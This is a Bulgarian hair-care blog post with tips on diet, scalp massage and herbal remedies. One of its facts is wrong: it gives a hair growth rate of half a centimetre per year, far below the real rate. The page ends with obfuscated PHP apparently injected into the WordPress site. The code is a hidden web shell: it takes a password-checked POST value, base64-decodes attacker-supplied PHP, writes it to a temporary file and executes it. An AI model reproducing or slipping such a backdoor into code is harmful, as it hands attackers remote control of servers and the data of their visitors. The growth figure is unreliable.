Увеличете растежа на косата | Косопад

Увеличете растежа на косата

kosa-podhranvane

Подхранване на растежа на косата. Може би сте си направили прическа, която не ви харесва и искате да възстановите дългата си коса или просто бихте искали косата ви да расте по- бързо. Но, възможно ли е това? Предлагаме ви няколко практични съвета, които ще са ви от полза:

Косата расте с половин сантиметър на година. Този ритъм може да остане засегнат от различни фактори като състояние на нервната система, стрес или липса на сън. Кръвоносната система също е определяща, защото доброто кръвоснабдяване кара косата да расте по- бързо. Тук са много полезни масажите, за да активират метаболизма и растежа на косата.

kosa-dieti

Храненето е ключът. Косата е изградена основно от протеини и затова трябва да приемате достатъчно чрез храненето си. Витамини също не бива да ви липсват, така че яжте достатъчно плодове и зеленчуци. Приемайте бирена мая, тъй като тя помага за растежа на косата.

Химическите продукти, слънчевите лъчи и някои лекарства могат да забавят растежа на косата. Но пък природата ни предлага богат избор от варианти, които да ни помогнат. Етеричното масло от розмарин е стимулант. Добавете 5- 7 капки към лек шампоан за честа употреба. Друг вариант е да направите на сок 2 листа от малва в половин чаша с вода. Нанесете за 15 минути течността върху скалпа и после измийте. Повтаряйте веднъж седмично.

И това далеч не са единствените варианти от природата – маски, лосиони и отвари могат да ви бъдат от полза.

04. юли 2014 19:10:02 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}